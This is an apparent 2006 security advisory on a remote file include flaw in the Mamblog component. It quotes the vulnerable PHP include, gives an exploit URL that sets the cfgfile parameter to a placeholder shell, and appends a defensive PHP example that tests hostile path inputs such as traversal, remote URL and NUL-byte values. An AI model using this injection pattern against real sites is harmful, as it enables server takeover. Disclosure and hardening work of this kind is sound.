Mamblog 1.0 Version - Remote File Include Vulnerabilities

2006-06-13T00:00:00
ID SECURITYVULNS:DOC:13124
Type securityvulns
Reporter Securityvulns
Modified 2006-06-13T00:00:00

Description

SaVSaK.CoM | SpC-x - The-BeKiR |

Risk : High

Class: Remote

Script : Mamblog

Credits : SpC-x

Thanks : The-BeKiR - Ejder - FasTBoY - ERNE - RMx - Nukedx - Str0ke

Code :

$cfgfile = "$mosConfig_absolute_path/components/$option/configuration.php";

include_once( $cfgfile );

Vulnerable :

http://www.victim.com/Mamblog/admin.mamblog.php?cfgfile=Command-Shell
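
Added example (not from the original advisory or from Mamblog's code): one way to build the include path shown under "Code" so that request input cannot select the file that gets included. The helper name resolve_component_config(), the com_ naming pattern for $option and the demo directory tree are assumptions made for illustration.

```php
<?php
// Added example, not Mamblog code; resolve_component_config() is hypothetical.
function resolve_component_config(string $basePath, string $option): ?string
{
    // Allow only a fixed alphabet (assumed com_ naming): no slashes, dots,
    // URL schemes or NUL bytes can reach the include path.
    if (!preg_match('/\Acom_[a-z0-9_]{1,32}\z/', $option)) {
        return null;
    }
    $componentsDir = realpath($basePath . '/components');
    if ($componentsDir === false) {
        return null;
    }
    // realpath() returns false unless the path exists on the local filesystem.
    $candidate = realpath($componentsDir . '/' . $option . '/configuration.php');
    if ($candidate === false) {
        return null;
    }
    // Containment check: the resolved file must sit under components/.
    $prefix = $componentsDir . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $candidate;
}

// Constructed demo tree standing in for a site root.
$root = sys_get_temp_dir() . '/mamblog_demo_' . getmypid();
$compDir = $root . '/components/com_mamblog';
mkdir($compDir, 0700, true);
file_put_contents($compDir . '/configuration.php', "<?php\n");

// $root is set by server-side code, never taken from request variables.
// Constructed sample values for $option:
$samples = ['com_mamblog', '../../etc', 'http://example.invalid/x', "com_mamblog\0.txt"];
foreach ($samples as $option) {
    $path = resolve_component_config($root, $option);
    $verdict = $path === null ? 'rejected' : 'include_once ' . $path;
    echo json_encode($option, JSON_UNESCAPED_SLASHES), ' => ', $verdict, "\n";
}

// Remove the demo tree.
unlink($compDir . '/configuration.php');
rmdir($compDir);
rmdir($root . '/components');
rmdir($root);
```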